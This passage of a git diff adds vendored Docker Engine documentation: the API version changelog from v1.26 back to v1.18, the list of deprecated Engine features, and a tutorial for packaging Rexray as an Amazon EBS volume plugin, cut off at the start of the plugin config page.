+[Docker Engine API v1.26](https://docs.docker.com/engine/api/v1.26/) documentation
+
+* `POST /plugins/(plugin name)/upgrade` upgrade a plugin.
+
+## v1.25 API changes
+
+[Docker Engine API v1.25](https://docs.docker.com/engine/api/v1.25/) documentation
+
+* The API version is now required in all API calls. Instead of just requesting, for example, the URL `/containers/json`, you must now request `/v1.25/containers/json`.
+* `GET /version` now returns `MinAPIVersion`.
+* `POST /build` accepts `networkmode` parameter to specify network used during build.
+* `GET /images/(name)/json` now returns `OsVersion` if populated
+* `GET /info` now returns `Isolation`.
+* `POST /containers/create` now takes `AutoRemove` in HostConfig, to enable auto-removal of the container on daemon side when the container's process exits.
+* `GET /containers/json` and `GET /containers/(id or name)/json` now return `"removing"` as a value for the `State.Status` field if the container is being removed. Previously, "exited" was returned as status.
+* `GET /containers/json` now accepts `removing` as a valid value for the `status` filter.
+* `GET /containers/json` now supports filtering containers by `health` status.
+* `DELETE /volumes/(name)` now accepts a `force` query parameter to force removal of volumes that were already removed out of band by the volume driver plugin.
+* `POST /containers/create/` and `POST /containers/(name)/update` now validates restart policies.
+* `POST /containers/create` now validates IPAMConfig in NetworkingConfig, and returns error for invalid IPv4 and IPv6 addresses (`--ip` and `--ip6` in `docker create/run`).
+* `POST /containers/create` now takes a `Mounts` field in `HostConfig` which replaces `Binds`, `Volumes`, and `Tmpfs`. *note*: `Binds`, `Volumes`, and `Tmpfs` are still available and can be combined with `Mounts`.
+* `POST /build` now performs a preliminary validation of the `Dockerfile` before starting the build, and returns an error if the syntax is incorrect. Note that this change is _unversioned_ and applied to all API versions.
+* `POST /build` accepts `cachefrom` parameter to specify images used for build cache.
+* `GET /networks/` endpoint now correctly returns a list of *all* networks,
+  instead of the default network if a trailing slash is provided, but no `name`
+  or `id`.
+* `DELETE /containers/(name)` endpoint now returns an error of `removal of container name is already in progress` with status code of 400, when container name is in a state of removal in progress.
+* `GET /containers/json` now supports a `is-task` filter to filter
+  containers that are tasks (part of a service in swarm mode).
+* `POST /containers/create` now takes `StopTimeout` field.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept `Monitor` and `MaxFailureRatio` parameters, which control the response to failures during service updates.
+* `POST /services/(id or name)/update` now accepts a `ForceUpdate` parameter inside the `TaskTemplate`, which causes the service to be updated even if there are no changes which would ordinarily trigger an update.
+* `POST /services/create` and `POST /services/(id or name)/update` now return a `Warnings` array.
+* `GET /networks/(name)` now returns field `Created` in response to show network created time.
+* `POST /containers/(id or name)/exec` now accepts an `Env` field, which holds a list of environment variables to be set in the context of the command execution.
+* `GET /volumes`, `GET /volumes/(name)`, and `POST /volumes/create` now return the `Options` field which holds the driver specific options to use for when creating the volume.
+* `GET /exec/(id)/json` now returns `Pid`, which is the system pid for the exec'd process.
+* `POST /containers/prune` prunes stopped containers.
+* `POST /images/prune` prunes unused images.
+* `POST /volumes/prune` prunes unused volumes.
+* `POST /networks/prune` prunes unused networks.
+* Every API response now includes a `Docker-Experimental` header specifying if experimental features are enabled (value can be `true` or `false`).
+* Every API response now includes a `API-Version` header specifying the default API version of the server.
+* The `hostConfig` option now accepts the fields `CpuRealtimePeriod` and `CpuRtRuntime` to allocate cpu runtime to rt tasks when `CONFIG_RT_GROUP_SCHED` is enabled in the kernel.
+* The `SecurityOptions` field within the `GET /info` response now includes `userns` if user namespaces are enabled in the daemon.
+* `GET /nodes` and `GET /node/(id or name)` now return `Addr` as part of a node's `Status`, which is the address that that node connects to the manager from.
+* The `HostConfig` field now includes `NanoCPUs` that represents CPU quota in units of 10<sup>-9</sup> CPUs.
+* `GET /info` now returns more structured information about security options.
+* The `HostConfig` field now includes `CpuCount` that represents the number of CPUs available for execution by the container. Windows daemon only.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept the `TTY` parameter, which allocate a pseudo-TTY in container.
+* `POST /services/create` and `POST /services/(id or name)/update` now accept the `DNSConfig` parameter, which specifies DNS related configurations in resolver configuration file (resolv.conf) through `Nameservers`, `Search`, and `Options`.
+* `GET /networks/(id or name)` now includes IP and name of all peers nodes for swarm mode overlay networks.
+* `GET /plugins` list plugins.
+* `POST /plugins/pull?name=<plugin name>` pulls a plugin.
+* `GET /plugins/(plugin name)` inspect a plugin.
+* `POST /plugins/(plugin name)/set` configure a plugin.
+* `POST /plugins/(plugin name)/enable` enable a plugin.
+* `POST /plugins/(plugin name)/disable` disable a plugin.
+* `POST /plugins/(plugin name)/push` push a plugin.
+* `POST /plugins/create?name=(plugin name)` create a plugin.
+* `DELETE /plugins/(plugin name)` delete a plugin.
+* `POST /node/(id or name)/update` now accepts both `id` or `name` to identify the node to update.
+* `GET /images/json` now support a `reference` filter.
+* `GET /secrets` returns information on the secrets.
+* `POST /secrets/create` creates a secret.
+* `DELETE /secrets/{id}` removes the secret `id`.
+* `GET /secrets/{id}` returns information on the secret `id`.
+* `POST /secrets/{id}/update` updates the secret `id`.
+
+## v1.24 API changes
+
+[Docker Engine API v1.24](v1.24.md) documentation
+
+* `POST /containers/create` now takes `StorageOpt` field.
+* `GET /info` now returns `SecurityOptions` field, showing if `apparmor`, `seccomp`, or `selinux` is supported.
+* `GET /info` no longer returns the `ExecutionDriver` property. This property was no longer used after integration
+  with ContainerD in Docker 1.11.
+* `GET /networks` now supports filtering by `label` and `driver`.
+* `GET /containers/json` now supports filtering containers by `network` name or id.
+* `POST /containers/create` now takes `IOMaximumBandwidth` and `IOMaximumIOps` fields. Windows daemon only.
+* `POST /containers/create` now returns an HTTP 400 "bad parameter" message
+  if no command is specified (instead of an HTTP 500 "server error")
+* `GET /images/search` now takes a `filters` query parameter.
+* `GET /events` now supports a `reload` event that is emitted when the daemon configuration is reloaded.
+* `GET /events` now supports filtering by daemon name or ID.
+* `GET /events` now supports a `detach` event that is emitted on detaching from container process.
+* `GET /events` now supports an `exec_detach ` event that is emitted on detaching from exec process.
+* `GET /images/json` now supports filters `since` and `before`.
+* `POST /containers/(id or name)/start` no longer accepts a `HostConfig`.
+* `POST /images/(name)/tag` no longer has a `force` query parameter.
+* `GET /images/search` now supports maximum returned search results `limit`.
+* `POST /containers/{name:.*}/copy` is now removed and errors out starting from this API version.
+* API errors are now returned as JSON instead of plain text.
+* `POST /containers/create` and `POST /containers/(id)/start` allow you to configure kernel parameters (sysctls) for use in the container.
+* `POST /containers/<container ID>/exec` and `POST /exec/<exec ID>/start`
+  no longer expects a "Container" field to be present. This property was not used
+  and is no longer sent by the docker client.
+* `POST /containers/create/` now validates the hostname (should be a valid RFC 1123 hostname).
+* `POST /containers/create/` `HostConfig.PidMode` field now accepts `container:<name|id>`,
+  to have the container join the PID namespace of an existing container.
+
+## v1.23 API changes
+
+[Docker Engine API v1.23](v1.23.md) documentation
+
+* `GET /containers/json` returns the state of the container, one of `created`, `restarting`, `running`, `paused`, `exited` or `dead`.
+* `GET /containers/json` returns the mount points for the container.
+* `GET /networks/(name)` now returns an `Internal` field showing whether the network is internal or not.
+* `GET /networks/(name)` now returns an `EnableIPv6` field showing whether the network has ipv6 enabled or not.
+* `POST /containers/(name)/update` now supports updating container's restart policy.
+* `POST /networks/create` now supports enabling ipv6 on the network by setting the `EnableIPv6` field (doing this with a label will no longer work).
+* `GET /info` now returns `CgroupDriver` field showing what cgroup driver the daemon is using; `cgroupfs` or `systemd`.
+* `GET /info` now returns `KernelMemory` field, showing if "kernel memory limit" is supported.
+* `POST /containers/create` now takes `PidsLimit` field, if the kernel is >= 4.3 and the pids cgroup is supported.
+* `GET /containers/(id or name)/stats` now returns `pids_stats`, if the kernel is >= 4.3 and the pids cgroup is supported.
+* `POST /containers/create` now allows you to override usernamespaces remapping and use privileged options for the container.
+* `POST /containers/create` now allows specifying `nocopy` for named volumes, which disables automatic copying from the container path to the volume.
+* `POST /auth` now returns an `IdentityToken` when supported by a registry.
+* `POST /containers/create` with both `Hostname` and `Domainname` fields specified will result in the container's hostname being set to `Hostname`, rather than `Hostname.Domainname`.
+* `GET /volumes` now supports more filters, new added filters are `name` and `driver`.
+* `GET /containers/(id or name)/logs` now accepts a `details` query parameter to stream the extra attributes that were provided to the containers `LogOpts`, such as environment variables and labels, with the logs.
+* `POST /images/load` now returns progress information as a JSON stream, and has a `quiet` query parameter to suppress progress details.
+
+## v1.22 API changes
+
+[Docker Engine API v1.22](v1.22.md) documentation
+
+* `POST /container/(name)/update` updates the resources of a container.
+* `GET /containers/json` supports filter `isolation` on Windows.
+* `GET /containers/json` now returns the list of networks of containers.
+* `GET /info` Now returns `Architecture` and `OSType` fields, providing information
+  about the host architecture and operating system type that the daemon runs on.
+* `GET /networks/(name)` now returns a `Name` field for each container attached to the network.
+* `GET /version` now returns the `BuildTime` field in RFC3339Nano format to make it
+  consistent with other date/time values returned by the API.
+* `AuthConfig` now supports a `registrytoken` for token based authentication
+* `POST /containers/create` now has a 4M minimum value limit for `HostConfig.KernelMemory`
+* Pushes initiated with `POST /images/(name)/push` and pulls initiated with `POST /images/create`
+  will be cancelled if the HTTP connection making the API request is closed before
+  the push or pull completes.
+* `POST /containers/create` now allows you to set a read/write rate limit for a
+  device (in bytes per second or IO per second).
+* `GET /networks` now supports filtering by `name`, `id` and `type`.
+* `POST /containers/create` now allows you to set the static IPv4 and/or IPv6 address for the container.
+* `POST /networks/(id)/connect` now allows you to set the static IPv4 and/or IPv6 address for the container.
+* `GET /info` now includes the number of containers running, stopped, and paused.
+* `POST /networks/create` now supports restricting external access to the network by setting the `Internal` field.
+* `POST /networks/(id)/disconnect` now includes a `Force` option to forcefully disconnect a container from network
+* `GET /containers/(id)/json` now returns the `NetworkID` of containers.
+* `POST /networks/create` Now supports an options field in the IPAM config that provides options
+  for custom IPAM plugins.
+* `GET /networks/{network-id}` Now returns IPAM config options for custom IPAM plugins if any
+  are available.
+* `GET /networks/<network-id>` now returns subnets info for user-defined networks.
+* `GET /info` can now return a `SystemStatus` field useful for returning additional information about applications
+  that are built on top of engine.
+
+## v1.21 API changes
+
+[Docker Engine API v1.21](v1.21.md) documentation
+
+* `GET /volumes` lists volumes from all volume drivers.
+* `POST /volumes/create` to create a volume.
+* `GET /volumes/(name)` get low-level information about a volume.
+* `DELETE /volumes/(name)` remove a volume with the specified name.
+* `VolumeDriver` was moved from `config` to `HostConfig` to make the configuration portable.
+* `GET /images/(name)/json` now returns information about an image's `RepoTags` and `RepoDigests`.
+* The `config` option now accepts the field `StopSignal`, which specifies the signal to use to kill a container.
+* `GET /containers/(id)/stats` will return networking information respectively for each interface.
+* The `HostConfig` option now includes the `DnsOptions` field to configure the container's DNS options.
+* `POST /build` now optionally takes a serialized map of build-time variables.
+* `GET /events` now includes a `timenano` field, in addition to the existing `time` field.
+* `GET /events` now supports filtering by image and container labels.
+* `GET /info` now lists engine version information and return the information of `CPUShares` and `Cpuset`.
+* `GET /containers/json` will return `ImageID` of the image used by container.
+* `POST /exec/(name)/start` will now return an HTTP 409 when the container is either stopped or paused.
+* `POST /containers/create` now takes `KernelMemory` in HostConfig to specify kernel memory limit.
+* `GET /containers/(name)/json` now accepts a `size` parameter. Setting this parameter to '1' returns container size information in the `SizeRw` and `SizeRootFs` fields.
+* `GET /containers/(name)/json` now returns a `NetworkSettings.Networks` field,
+  detailing network settings per network. This field deprecates the
+  `NetworkSettings.Gateway`, `NetworkSettings.IPAddress`,
+  `NetworkSettings.IPPrefixLen`, and `NetworkSettings.MacAddress` fields, which
+  are still returned for backward-compatibility, but will be removed in a future version.
+* `GET /exec/(id)/json` now returns a `NetworkSettings.Networks` field,
+  detailing networksettings per network. This field deprecates the
+  `NetworkSettings.Gateway`, `NetworkSettings.IPAddress`,
+  `NetworkSettings.IPPrefixLen`, and `NetworkSettings.MacAddress` fields, which
+  are still returned for backward-compatibility, but will be removed in a future version.
+* The `HostConfig` option now includes the `OomScoreAdj` field for adjusting the
+  badness heuristic. This heuristic selects which processes the OOM killer kills
+  under out-of-memory conditions.
+
+## v1.20 API changes
+
+[Docker Engine API v1.20](v1.20.md) documentation
+
+* `GET /containers/(id)/archive` get an archive of filesystem content from a container.
+* `PUT /containers/(id)/archive` upload an archive of content to be extracted to
+an existing directory inside a container's filesystem.
+* `POST /containers/(id)/copy` is deprecated in favor of the above `archive`
+endpoint which can be used to download files and directories from a container.
+* The `hostConfig` option now accepts the field `GroupAdd`, which specifies a
+list of additional groups that the container process will run as.
+
+## v1.19 API changes
+
+[Docker Engine API v1.19](v1.19.md) documentation
+
+* When the daemon detects a version mismatch with the client, usually when
+the client is newer than the daemon, an HTTP 400 is now returned instead
+of a 404.
+* `GET /containers/(id)/stats` now accepts `stream` bool to get only one set of stats and disconnect.
+* `GET /containers/(id)/logs` now accepts a `since` timestamp parameter.
+* `GET /info` The fields `Debug`, `IPv4Forwarding`, `MemoryLimit`, and
+`SwapLimit` are now returned as boolean instead of as an int. In addition, the
+end point now returns the new boolean fields `CpuCfsPeriod`, `CpuCfsQuota`, and
+`OomKillDisable`.
+* The `hostConfig` option now accepts the fields `CpuPeriod` and `CpuQuota`
+* `POST /build` accepts `cpuperiod` and `cpuquota` options
+
+## v1.18 API changes
+
+[Docker Engine API v1.18](v1.18.md) documentation
+
+* `GET /version` now returns `Os`, `Arch` and `KernelVersion`.
+* `POST /containers/create` and `POST /containers/(id)/start`allow you to  set ulimit settings for use in the container.
+* `GET /info` now returns `SystemTime`, `HttpProxy`,`HttpsProxy` and `NoProxy`.
+* `GET /images/json` added a `RepoDigests` field to include image digest information.
+* `POST /build` can now set resource constraints for all containers created for the build.
+* `CgroupParent` can be passed in the host config to setup container cgroups under a specific cgroup.
+* `POST /build` closing the HTTP request cancels the build
+* `POST /containers/(id)/exec` includes `Warnings` field to response.
diff --git a/vendor/github.com/docker/docker/docs/deprecated.md b/vendor/github.com/docker/docker/docs/deprecated.md
new file mode 100644
index 0000000000..1298370ba9
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/deprecated.md
@@ -0,0 +1,286 @@
+---
+aliases: ["/engine/misc/deprecated/"]
+title: "Deprecated Engine Features"
+description: "Deprecated Features."
+keywords: "docker, documentation, about, technology, deprecate"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Deprecated Engine Features
+
+The following list of features are deprecated in Engine.
+To learn more about Docker Engine's deprecation policy,
+see [Feature Deprecation Policy](https://docs.docker.com/engine/#feature-deprecation-policy).
+
+
+### Top-level network properties in NetworkSettings
+
+**Deprecated In Release: v1.13.0**
+
+**Target For Removal In Release: v1.16**
+
+When inspecting a container, `NetworkSettings` contains top-level information
+about the default ("bridge") network;
+
+`EndpointID`, `Gateway`, `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`,
+`IPPrefixLen`, `IPv6Gateway`, and `MacAddress`.
+
+These properties are deprecated in favor of per-network properties in
+`NetworkSettings.Networks`. These properties were already "deprecated" in
+docker 1.9, but kept around for backward compatibility.
+
+Refer to [#17538](https://github.com/docker/docker/pull/17538) for further
+information.
+
+## `filter` param for `/images/json` endpoint
+**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
+
+**Target For Removal In Release: v1.16**
+
+The `filter` param to filter the list of image by reference (name or name:tag) is now implemented as a regular filter, named `reference`.
+
+### `repository:shortid` image references
+**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
+
+**Target For Removal In Release: v1.16**
+
+`repository:shortid` syntax for referencing images is very little used, collides with tag references can be confused with digest references.
+
+### `docker daemon` subcommand
+**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
+
+**Target For Removal In Release: v1.16**
+
+The daemon is moved to a separate binary (`dockerd`), and should be used instead.
+
+### Duplicate keys with conflicting values in engine labels
+**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
+
+**Target For Removal In Release: v1.16**
+
+Duplicate keys with conflicting values have been deprecated. A warning is displayed
+in the output, and an error will be returned in the future.
+
+### `MAINTAINER` in Dockerfile
+**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
+
+`MAINTAINER` was an early very limited form of `LABEL` which should be used instead.
+
+### API calls without a version
+**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
+
+**Target For Removal In Release: v1.16**
+
+API versions should be supplied to all API calls to ensure compatibility with
+future Engine versions. Instead of just requesting, for example, the URL
+`/containers/json`, you must now request `/v1.25/containers/json`.
+
+### Backing filesystem without `d_type` support for overlay/overlay2
+**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
+
+**Target For Removal In Release: v1.16**
+
+The overlay and overlay2 storage driver does not work as expected if the backing
+filesystem does not support `d_type`. For example, XFS does not support `d_type`
+if it is formatted with the `ftype=0` option.
+
+Please also refer to [#27358](https://github.com/docker/docker/issues/27358) for
+further information.
+
+### Three arguments form in `docker import`
+**Deprecated In Release: [v0.6.7](https://github.com/docker/docker/releases/tag/v0.6.7)**
+
+**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+The `docker import` command format `file|URL|- [REPOSITORY [TAG]]` is deprecated since November 2013. It's no more supported.
+
+### `-h` shorthand for `--help`
+
+**Deprecated In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+**Target For Removal In Release: v1.15**
+
+The shorthand (`-h`) is less common than `--help` on Linux and cannot be used
+on all subcommands (due to it conflicting with, e.g. `-h` / `--hostname` on
+`docker create`). For this reason, the `-h` shorthand was not printed in the
+"usage" output of subcommands, nor documented, and is now marked "deprecated".
+
+### `-e` and `--email` flags on `docker login`
+**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)**
+
+**Target For Removal In Release: v1.14**
+
+The docker login command is removing the ability to automatically register for an account with the target registry if the given username doesn't exist. Due to this change, the email flag is no longer required, and will be deprecated.
+
+### Separator (`:`) of `--security-opt` flag on `docker run`
+**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)**
+
+**Target For Removal In Release: v1.14**
+
+The flag `--security-opt` doesn't use the colon separator(`:`) anymore to divide keys and values, it uses the equal symbol(`=`) for consistency with other similar flags, like `--storage-opt`.
+
+### `/containers/(id or name)/copy` endpoint
+
+**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)**
+
+**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+The endpoint `/containers/(id or name)/copy` is deprecated in favor of `/containers/(id or name)/archive`.
+
+### Ambiguous event fields in API
+**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
+
+The fields `ID`, `Status` and `From` in the events API have been deprecated in favor of a more rich structure.
+See the events API documentation for the new format.
+
+### `-f` flag on `docker tag`
+**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
+
+**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+To make tagging consistent across the various `docker` commands, the `-f` flag on the `docker tag` command is deprecated. It is not longer necessary to specify `-f` to move a tag from one image to another. Nor will `docker` generate an error if the `-f` flag is missing and the specified tag is already in use.
+
+### HostConfig at API container start
+**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
+
+**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+Passing an `HostConfig` to `POST /containers/{name}/start` is deprecated in favor of
+defining it at container creation (`POST /containers/create`).
+
+### `--before` and `--since` flags on `docker ps`
+
+**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
+
+**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+The `docker ps --before` and `docker ps --since` options are deprecated.
+Use `docker ps --filter=before=...` and `docker ps --filter=since=...` instead.
+
+### `--automated` and `--stars` flags on `docker search`
+
+**Deprecated in Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+**Target For Removal In Release: v1.15**
+
+The `docker search --automated` and `docker search --stars` options are deprecated.
+Use `docker search --filter=is-automated=...` and `docker search --filter=stars=...` instead.
+
+### Driver Specific Log Tags
+**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)**
+
+**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+Log tags are now generated in a standard way across different logging drivers.
+Because of which, the driver specific log tag options `syslog-tag`, `gelf-tag` and
+`fluentd-tag` have been deprecated in favor of the generic `tag` option.
+
+    docker --log-driver=syslog --log-opt tag="{{.ImageName}}/{{.Name}}/{{.ID}}"
+
+### LXC built-in exec driver
+**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)**
+
+**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
+
+The built-in LXC execution driver, the lxc-conf flag, and API fields have been removed.
+
+### Old Command Line Options
+**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)**
+
+**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
+
+The flags `-d` and `--daemon` are deprecated in favor of the `daemon` subcommand:
+
+    docker daemon -H ...
+
+The following single-dash (`-opt`) variant of certain command line options
+are deprecated and replaced with double-dash options (`--opt`):
+
+    docker attach -nostdin
+    docker attach -sig-proxy
+    docker build -no-cache
+    docker build -rm
+    docker commit -author
+    docker commit -run
+    docker events -since
+    docker history -notrunc
+    docker images -notrunc
+    docker inspect -format
+    docker ps -beforeId
+    docker ps -notrunc
+    docker ps -sinceId
+    docker rm -link
+    docker run -cidfile
+    docker run -dns
+    docker run -entrypoint
+    docker run -expose
+    docker run -link
+    docker run -lxc-conf
+    docker run -n
+    docker run -privileged
+    docker run -volumes-from
+    docker search -notrunc
+    docker search -stars
+    docker search -t
+    docker search -trusted
+    docker tag -force
+
+The following double-dash options are deprecated and have no replacement:
+
+    docker run --cpuset
+    docker run --networking
+    docker ps --since-id
+    docker ps --before-id
+    docker search --trusted
+
+**Deprecated In Release: [v1.5.0](https://github.com/docker/docker/releases/tag/v1.5.0)**
+
+**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+The single-dash (`-help`) was removed, in favor of the double-dash `--help`
+
+    docker -help
+    docker [COMMAND] -help
+
+### `--run` flag on docker commit
+
+**Deprecated In Release: [v0.10.0](https://github.com/docker/docker/releases/tag/v0.10.0)**
+
+**Removed In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
+
+The flag `--run` of the docker commit (and its short version `-run`) were deprecated in favor
+of the `--changes` flag that allows to pass `Dockerfile` commands.
+
+
+### Interacting with V1 registries
+
+**Disabled By Default In Release: v1.14**
+
+**Target For Removal In Release: v1.17**
+
+Version 1.9 adds a flag (`--disable-legacy-registry=false`) which prevents the
+docker daemon from `pull`, `push`, and `login` operations against v1
+registries.  Though enabled by default, this signals the intent to deprecate
+the v1 protocol.
+
+Support for the v1 protocol to the public registry was removed in 1.13. Any
+mirror configurations using v1 should be updated to use a
+[v2 registry mirror](https://docs.docker.com/registry/recipes/mirror/).
+
+### Docker Content Trust ENV passphrase variables name change
+**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)**
+
+**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
+
+Since 1.9, Docker Content Trust Offline key has been renamed to Root key and the Tagging key has been renamed to Repository key. Due to this renaming, we're also changing the corresponding environment variables
+
+- DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE is now named DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE
+- DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE is now named DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE
diff --git a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md
new file mode 100644
index 0000000000..8c64efa164
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md
@@ -0,0 +1,164 @@
+---
+description: Volume plugin for Amazon EBS
+keywords: "API, Usage, plugins, documentation, developer, amazon, ebs, rexray, volume"
+title: Volume plugin for Amazon EBS
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# A proof-of-concept Rexray plugin
+
+In this example, a simple Rexray plugin will be created for the purposes of using
+it on an Amazon EC2 instance with EBS. It is not meant to be a complete Rexray plugin.
+
+The example source is available at [https://github.com/tiborvass/rexray-plugin](https://github.com/tiborvass/rexray-plugin).
+
+To learn more about Rexray: [https://github.com/codedellemc/rexray](https://github.com/codedellemc/rexray)
+
+## 1. Make a Docker image
+
+The following is the Dockerfile used to containerize rexray.
+
+```Dockerfile
+FROM debian:jessie
+RUN apt-get update && apt-get install -y --no-install-recommends wget ca-certificates
+RUN wget https://dl.bintray.com/emccode/rexray/stable/0.6.4/rexray-Linux-x86_64-0.6.4.tar.gz -O rexray.tar.gz && tar -xvzf rexray.tar.gz -C /usr/bin && rm rexray.tar.gz
+RUN mkdir -p /run/docker/plugins /var/lib/libstorage/volumes
+ENTRYPOINT ["rexray"]
+CMD ["--help"]
+```
+
+To build it you can run `image=$(cat Dockerfile | docker build -q -)` and `$image`
+will reference the containerized rexray image.
+
+## 2. Extract rootfs
+
+```sh
+$ TMPDIR=/tmp/rexray  # for the purpose of this example
+$  # create container without running it, to extract the rootfs from image
+$ docker create --name rexray "$image"
+$  # save the rootfs to a tar archive
+$ docker export -o $TMPDIR/rexray.tar rexray
+$  # extract rootfs from tar archive to a rootfs folder
+$ ( mkdir -p $TMPDIR/rootfs; cd $TMPDIR/rootfs; tar xf ../rexray.tar )
+```
+
+## 3. Add plugin configuration
+
+We have to put the following JSON to `$TMPDIR/config.json`:
+
+```json
+{
+      "Args": {
+        "Description": "",
+        "Name": "",
+        "Settable": null,
+        "Value": null
+      },
+      "Description": "A proof-of-concept EBS plugin (using rexray) for Docker",
+      "Documentation": "https://github.com/tiborvass/rexray-plugin",
+      "Entrypoint": [
+        "/usr/bin/rexray", "service", "start", "-f"
+      ],
+      "Env": [
+        {
+          "Description": "",
+          "Name": "REXRAY_SERVICE",
+          "Settable": [
+            "value"
+          ],
+          "Value": "ebs"
+        },
+        {
+          "Description": "",
+          "Name": "EBS_ACCESSKEY",
+          "Settable": [
+            "value"
+          ],
+          "Value": ""
+        },
+        {
+          "Description": "",
+          "Name": "EBS_SECRETKEY",
+          "Settable": [
+            "value"
+          ],
+          "Value": ""
+        }
+      ],
+      "Interface": {
+        "Socket": "rexray.sock",
+        "Types": [
+          "docker.volumedriver/1.0"
+        ]
+      },
+      "Linux": {
+        "AllowAllDevices": true,
+        "Capabilities": ["CAP_SYS_ADMIN"],
+        "Devices": null
+      },
+      "Mounts": [
+        {
+          "Source": "/dev",
+          "Destination": "/dev",
+          "Type": "bind",
+          "Options": ["rbind"]
+        }
+      ],
+      "Network": {
+        "Type": "host"
+      },
+      "PropagatedMount": "/var/lib/libstorage/volumes",
+      "User": {},
+      "WorkDir": ""
+}
+```
+
+Please note a couple of points:
+- `PropagatedMount` is needed so that the docker daemon can see mounts done by the
+rexray plugin from within the container, otherwise the docker daemon is not able
+to mount a docker volume.
+- The rexray plugin needs dynamic access to host devices. For that reason, we
+have to give it access to all devices under `/dev` and set `AllowAllDevices` to
+true for proper access.
+- The user of this simple plugin can change only 3 settings: `REXRAY_SERVICE`,
+`EBS_ACCESSKEY` and `EBS_SECRETKEY`. This is because of the reduced scope of this
+plugin. Ideally other rexray parameters could also be set.
+
+## 4. Create plugin
+
+`docker plugin create tiborvass/rexray-plugin "$TMPDIR"` will create the plugin.
+
+```sh
+$ docker plugin ls
+ID                  NAME                             DESCRIPTION                         ENABLED
+2475a4bd0ca5        tiborvass/rexray-plugin:latest   A rexray volume plugin for Docker   false
+```
+
+## 5. Test plugin
+
+```sh
+$ docker plugin set tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY`
+$ docker plugin enable tiborvass/rexray-plugin
+$ docker volume create -d tiborvass/rexray-plugin my-ebs-volume
+$ docker volume ls
+DRIVER                              VOLUME NAME
+tiborvass/rexray-plugin:latest      my-ebs-volume
+$ docker run --rm -v my-ebs-volume:/volume busybox sh -c 'echo bye > /volume/hi'
+$ docker run --rm -v my-ebs-volume:/volume busybox cat /volume/hi
+bye
+```
+
+## 6. Push plugin
+
+First, ensure you are logged in with `docker login`. Then you can run:
+`docker plugin push tiborvass/rexray-plugin` to push it like a regular docker
+image to a registry, to make it available for others to install via
+`docker plugin install tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY`.
diff --git a/vendor/github.com/docker/docker/docs/extend/config.md b/vendor/github.com/docker/docker/docs/extend/config.md
new file mode 100644
index 0000000000..096d2d0822
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/extend/config.md
@@ -0,0 +1,225 @@
+---
+title: "Plugin config"
+description: "How develop and use a plugin with the managed plugin system"
+keywords: "API, Usage, plugins, documentation, developer"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
